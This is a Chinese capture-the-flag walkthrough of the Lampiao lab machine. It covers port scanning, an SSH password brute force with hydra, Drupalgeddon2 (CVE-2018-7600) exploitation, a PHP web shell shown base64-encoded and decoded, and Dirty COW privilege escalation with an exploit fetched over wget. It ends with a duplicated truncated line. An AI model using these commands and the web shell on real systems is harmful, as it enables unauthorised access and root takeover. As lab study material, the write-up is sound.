Lampiao
该文章参考大余每日一攻防
1.nmap信息收集
└─$ nmap 192.168.225.138 -p-
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
2.网页信息枚举?q=node/2发现audio.m4a获得用户名
3.御剑遍历目录
在robots.txt中的CHANGELOG.txt文件发现cns版本为Drupal 7.54。
4.获得密码字典
使用 cewl http://192.168.225.138:1898/?q=node/1 -w lampiao.txt
5.hydra爆破获得密码
hydra -l tiago -P lampiao.txt 192.168.225.138 ssh
host: 192.168.225.138 login: tiago password: Virgulino
6.登录后发现低权限
ssh tiago@192.168.225.138
7.mfs-getshell
搜索关于Drupal 7.54 的利用
msfconsole
search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.225.138
set rpost 1898
run
shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
8.脏牛漏洞提权
searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/Desktop
主机搭建 :python3 -m http.server 8081
靶机下载 :wget http://192.168.225.129:8081/40847.cpp
编译执行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty 40847.cpp -lutil
获得密码:Root password is: dirtyCowFun
登录cat ./flag.txt 获得密码:9740616875908d91ddcdaa8aea3af366
9.xray扫描结果获得poc、
给出了两个poc链接,下载后安装执行
sudo gem install highline
./drupalgeddon2.rb http://10.211.55.9:1898/
{
"create_time": 1737269816952,
"detail": {
"addr": "http://192.168.225.138:1898/",
"payload": "",
"extra": {
"links": [
"https://github.com/dreadlocked/Drupalgeddon2", poc链接
"https://paper.seebug.org/567/"
],
"param": {}
}
},
"plugin": "poc-yaml-drupal-cve-2018-7600-rce",
"target": {
"url": "http://192.168.225.138:1898/"
},
"id": 0
}
通过base64方法上传shell.php成功获得shell!
*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
10.漏洞总结
CVE-2018-7600
Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。
Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。
CVE-2016-5195 脏牛漏洞
Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
``